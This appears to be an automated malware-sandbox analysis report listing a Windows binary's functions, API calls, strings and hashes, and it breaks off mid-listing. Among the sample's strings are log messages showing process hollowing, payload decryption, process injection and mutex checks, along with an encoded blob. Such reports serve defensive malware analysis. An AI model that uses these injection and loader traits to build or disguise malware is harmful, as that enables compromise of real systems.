String ID: $VlwdBRpVDxIeEBMWCl9QWFxaRVcNBw8XCQIZF1ZKICIsTlReVEpHemZfLhgXCVIfFxgUHgcHUVpcRURSSxAYGgQQWEoeAQ0HVkxVCgcKFwQTGUkaAQoeFx4EEQRFCxobRRQMBhIaDgRDUUpJUE1CW10HDgNHHQ0LBklJfWFIVUo+EQwPERALBFJucFlEQlJVMAUIAzwbBR8KDgVOZmJVVmNDRVQzGxgVAAYeRxAQBwxORSIZCQsAHQlVenpLSFVWVkwn$[ERROR] Failed to decrypt payload$[ERROR] Invalid process handle$[INFO] Mutex already exists: %s$[INFO] Mutex not found: %s$[INFO] Process handle closed$[INFO] Process hollowing executed for program: %s$[INFO] inject_process completed$[INFO] inject_process started$[SUCCESS] Payload decrypted, size: %zu bytes$[SUCCESS] Process handle obtained: 0x%p
API String ID: 1844779378-2110838316
Opcode ID: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
Instruction ID: 9ad18c44aa6adfd373f63306d0be26019fb3295aecc2b476ab4f976944cfb5e9
Opcode Fuzzy Hash: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
Instruction Fuzzy Hash: 3E336261C2E6C284F7118F29A8863F47762BF55388F685235DD8ED6BE6EF6C6244C304

Function 00007FF6099C0A70 Relevance: 57.8, APIs: 24, Strings: 8, Instructions: 1785stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6099C0B79

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C, 00007FF6099C3686
this, xrefs: 00007FF6099C3307
operator, xrefs: 00007FF6099C359C
__uuidof, xrefs: 00007FF6099C1D00
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55, 00007FF6099C367F
throw, xrefs: 00007FF6099C1B4C
noexcept , xrefs: 00007FF6099C3C36
operator, xrefs: 00007FF6099C0B92

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: strlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$__uuidof$noexcept $operator$operator$starts_with(Res, "operator") && "operator name does not start with 'operator'"$this$throw
API String ID: 39653677-1316449214
Opcode ID: eeeaa255a0b47bf375ba76d33c8e646cc80b874b038ff034130d583932985c51
Instruction ID: da60483d163e045f387cc3e1ae2f5caecd0b2ed7f91bc3b89255390da912ba51
Opcode Fuzzy Hash: eeeaa255a0b47bf375ba76d33c8e646cc80b874b038ff034130d583932985c51
Instruction Fuzzy Hash: D7E2E5A2A09B8281EA618F15E84137D77A6EB45B90F6C8931DE8D877D6DF3CE552C300

Function 00007FF6099C6520 Relevance: 37.2, APIs: 16, Strings: 5, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

realloc.MSVCRT ref: 00007FF6099C66DC
malloc.MSVCRT ref: 00007FF6099C6735
malloc.MSVCRT ref: 00007FF6099C67D7
malloc.MSVCRT ref: 00007FF6099C684C
memcpy.MSVCRT ref: 00007FF6099C686B
realloc.MSVCRT ref: 00007FF6099C68CB
memchr.MSVCRT ref: 00007FF6099C694E
malloc.MSVCRT ref: 00007FF6099C6999
memcpy.MSVCRT ref: 00007FF6099C69B8
realloc.MSVCRT ref: 00007FF6099C6A61
malloc.MSVCRT ref: 00007FF6099C6A7A
memcpy.MSVCRT ref: 00007FF6099C6A99
malloc.MSVCRT ref: 00007FF6099C6B90
free.MSVCRT ref: 00007FF6099C6C51
_assert.MSVCRT ref: 00007FF6099C6C80
_assert.MSVCRT ref: 00007FF6099C6C9A

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C6C73, 00007FF6099C6C8D
yptn, xrefs: 00007FF6099C68C0
'block-literal', xrefs: 00007FF6099C682F
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF6099C6C6C
Last != First && "Popping empty vector!", xrefs: 00007FF6099C6C86

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$memcpyrealloc$_assert$freememchr
String ID: 'block-literal'$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Popping empty vector!"$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
API String ID: 3787261664-3461159648
Opcode ID: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
Instruction ID: e7e99799ea8681c0dc1ab9084a40416171c0e4c45921b4a610250f9f8299d722
Opcode Fuzzy Hash: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
Instruction Fuzzy Hash: 2F22C57260AB8281EB248F25E84437977A6FB45B84F6C4635DB9D87796EF3CE145C300

Function 00007FF6099BAD10 Relevance: 32.1, APIs: 12, Strings: 6, Instructions: 591
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF6099BAE6B
free.MSVCRT ref: 00007FF6099BAEE1
memcpy.MSVCRT ref: 00007FF6099BAF1A

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099BB8E6
Ua9enabl, xrefs: 00007FF6099BB20E
initializer for module , xrefs: 00007FF6099BB441
guard variable for , xrefs: 00007FF6099BB19A
Index <= size() && "dropBack() can't expand!", xrefs: 00007FF6099BB8DF
able_ifI, xrefs: 00007FF6099BB21B

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: memcpy$free
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Index <= size() && "dropBack() can't expand!"$Ua9enabl$able_ifI$guard variable for $initializer for module
API String ID: 2888793982-723539340
Opcode ID: 56c756458f6442a6091dfe210a7685922c485abfd09ba2f0b48504d6191023ce
Instruction ID: 58f18d8097131ac94b30e234bda02a4c6f18a6a4c191e55b0e4bb5bf0cccdb7f
Opcode Fuzzy Hash: 56c756458f6442a6091dfe210a7685922c485abfd09ba2f0b48504d6191023ce
Instruction Fuzzy Hash: 10427332A1AB8585EA648F15E5843AD73B6FB45780F684136DB8E87BD6DF7CE085C300

Function 00007FF6099BA480 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 400
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF6099BA4C9
malloc.MSVCRT ref: 00007FF6099BA813
realloc.MSVCRT ref: 00007FF6099BAA84
free.MSVCRT ref: 00007FF6099BAAFA
free.MSVCRT ref: 00007FF6099BAB14
free.MSVCRT ref: 00007FF6099BAB26
free.MSVCRT ref: 00007FF6099BAB38
free.MSVCRT ref: 00007FF6099BAB47

Strings

invocation function for block in , xrefs: 00007FF6099BA9B6
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_demangle.cpp, xrefs: 00007FF6099BABA2
k_invoke, xrefs: 00007FF6099BA909
___Z, xrefs: 00007FF6099BA752
____, xrefs: 00007FF6099BA765
Parser.ForwardTemplateRefs.empty(), xrefs: 00007FF6099BAB9B
_block_i, xrefs: 00007FF6099BA8FC

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: free$mallocreallocstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_demangle.cpp$Parser.ForwardTemplateRefs.empty()$___Z$____$_block_i$invocation function for block in $k_invoke
API String ID: 3545345670-2202808109
Opcode ID: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
Instruction ID: bcedd02ff15c1601a7d2c1e680e063feeb79980630d4907f52057209a2d89131
Opcode Fuzzy Hash: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
Instruction Fuzzy Hash: BC127E3290EBC181EA758F04E5543FAB3B6EB94750F694231EA9D42B96EF7CD185CB00

Function 00007FF6099CD0F0 Relevance: 15.4, APIs: 9, Strings: 1, Instructions: 416stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099CD207
malloc.MSVCRT ref: 00007FF6099CD31B
malloc.MSVCRT ref: 00007FF6099CD47B
malloc.MSVCRT ref: 00007FF6099CD51E
strlen.MSVCRT ref: 00007FF6099CD553
malloc.MSVCRT ref: 00007FF6099CD5CE
strlen.MSVCRT ref: 00007FF6099CD603
malloc.MSVCRT ref: 00007FF6099CD67E
strlen.MSVCRT ref: 00007FF6099CD6B3

Strings

objcprot, xrefs: 00007FF6099CD2A1

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$strlen
String ID: objcprot
API String ID: 832207080-2390413308
Opcode ID: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
Instruction ID: 15e378ea2c4a13e5a0727570daa503907bbd6d7d317189e3914fb1d9ccd3db45
Opcode Fuzzy Hash: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
Instruction Fuzzy Hash: 0C023772609B8191EB158F25E8446A937A6EB09B90F694731DFAC873D6DF3CE562C300

Function 00007FF6099C4440 Relevance: 13.0, APIs: 10, Instructions: 464COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099C446C
malloc.MSVCRT ref: 00007FF6099C4575
malloc.MSVCRT ref: 00007FF6099C4675
malloc.MSVCRT ref: 00007FF6099C4700
malloc.MSVCRT ref: 00007FF6099C47DA
malloc.MSVCRT ref: 00007FF6099C48E8
malloc.MSVCRT ref: 00007FF6099C495C

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
Instruction ID: 58c97d720bc5631419841eeeb12c1dae8392ee41f143058243e1d1de95a83bdb
Opcode Fuzzy Hash: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
Instruction Fuzzy Hash: 5C22D07270AB8185EB558F15E8943AD37A9EB04B80F6C4A35DB9D4B3A2DF38E552C310

Function 00007FF6099C0160 Relevance: 10.9, APIs: 7, Instructions: 377COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099C0280
malloc.MSVCRT ref: 00007FF6099C0376
malloc.MSVCRT ref: 00007FF6099C06A8

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
Instruction ID: faf186a19cc2277e3082509695c363129d2497855b31c83d39e7f5ab6f5d5dd8
Opcode Fuzzy Hash: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
Instruction Fuzzy Hash: 6AE1E4B260AB8285EF158F15D9407B967A6EB45B80F6C4A31DE8D8B7D3EF3CE5518300

Function 00007FF6099D2710 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6099D271B
GetProcAddress.KERNEL32 ref: 00007FF6099D272B

Strings

kernel32.dll, xrefs: 00007FF6099D2714
GetSystemTimePreciseAsFileTime, xrefs: 00007FF6099D2721

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 1646373207-706389432
Opcode ID: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
Instruction ID: 39afd4222cf9e76592f90b629cf8d7ad453ab99ac1bd059ab69a9ba5d6aeb684
Opcode Fuzzy Hash: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
Instruction Fuzzy Hash: 40E06734E5FA0792EE449F51ED8613423A2BF59754FB84439C81E87362FF6DA15A8310

Function 00007FF6099C76E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C7A37
memcpy.MSVCRT ref: 00007FF6099C7A53

Strings

%LaL, xrefs: 00007FF6099C79E9

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: memcpyrealloc
String ID: %LaL
API String ID: 2500458235-3433341929
Opcode ID: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
Instruction ID: 7173d6beb421934e38869d6ddc3968946130163923c472820f1a8061d6bb03bc
Opcode Fuzzy Hash: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
Instruction Fuzzy Hash: EA916A6BB1C6E112EB394735F550F9D2E61C7A2762F059315CBB403F9ADA2EC2168B04

Function 00007FF6099B92BB Relevance: 2.3, APIs: 1, Instructions: 1088COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b51e2a745836820ae5e51b927a30219108dac0aaa5d01f5bdc8f99822855a4c1
Instruction ID: 0318dda321e5cc2c8364cdeb657aba231d39519b9c5e011ab0a82644e1c5e563
Opcode Fuzzy Hash: b51e2a745836820ae5e51b927a30219108dac0aaa5d01f5bdc8f99822855a4c1
Instruction Fuzzy Hash: C8921732A1D64286E7658F25A65033A77A2FF957C8F284135EE4ED3B96DE3CE441CB00

Function 00007FF6099B1B40 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb96e3d47f38f9666091484b2575135f7935362b06e64030a895774840bb5cc
Instruction ID: d6dd10bef32951a69c8bdf8ae69a2869347c251cee57fc441fccce522749d737
Opcode Fuzzy Hash: 7eb96e3d47f38f9666091484b2575135f7935362b06e64030a895774840bb5cc
Instruction Fuzzy Hash: C0A13662B1C79142FB248F15A6207BA67E2FB997D0F288235DE9D83B96DE3DD045C700

Function 00007FF6099B4120 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6099B8350: RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF6099B84FA

fflush.MSVCRT ref: 00007FF6099B4370
fflush.MSVCRT ref: 00007FF6099B422D

Part of subcall function 00007FF6099B8A70: getenv.MSVCRT ref: 00007FF6099B8A93

fflush.MSVCRT ref: 00007FF6099B4287
fflush.MSVCRT ref: 00007FF6099B42D2
fflush.MSVCRT ref: 00007FF6099B4336
fflush.MSVCRT ref: 00007FF6099B43CE
fflush.MSVCRT ref: 00007FF6099B440E
fflush.MSVCRT ref: 00007FF6099B4448

Strings

libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK, xrefs: 00007FF6099B438D
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND, xrefs: 00007FF6099B431D
libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK, xrefs: 00007FF6099B442B
libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p, xrefs: 00007FF6099B42B6
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK, xrefs: 00007FF6099B43F2
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT, xrefs: 00007FF6099B4357
libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d, xrefs: 00007FF6099B426B
libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx, xrefs: 00007FF6099B4214
.anonymous., xrefs: 00007FF6099B41E6
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR, xrefs: 00007FF6099B4499
libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function, xrefs: 00007FF6099B43AE

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflush$CaptureContextgetenv
String ID: .anonymous.$libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p$libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT$libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx$libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d$libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function
API String ID: 3501801798-3031193476
Opcode ID: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
Instruction ID: afcd1038e1ce333c81b0df8845155f4898c7afe7d36e7c3af53c7867adbb9980
Opcode Fuzzy Hash: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
Instruction Fuzzy Hash: 2E819F10A0E65341FA14BF62AA163BA6367AF85BC8F6C0039DE4E973D3DE3CE5059341

Function 00007FF6099B3820 Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fflush.MSVCRT ref: 00007FF6099B387D
memcpy.MSVCRT ref: 00007FF6099B39F9
fflush.MSVCRT ref: 00007FF6099B3B05
fflush.MSVCRT ref: 00007FF6099B3B5D
RtlUnwindEx.KERNEL32 ref: 00007FF6099B3CEA
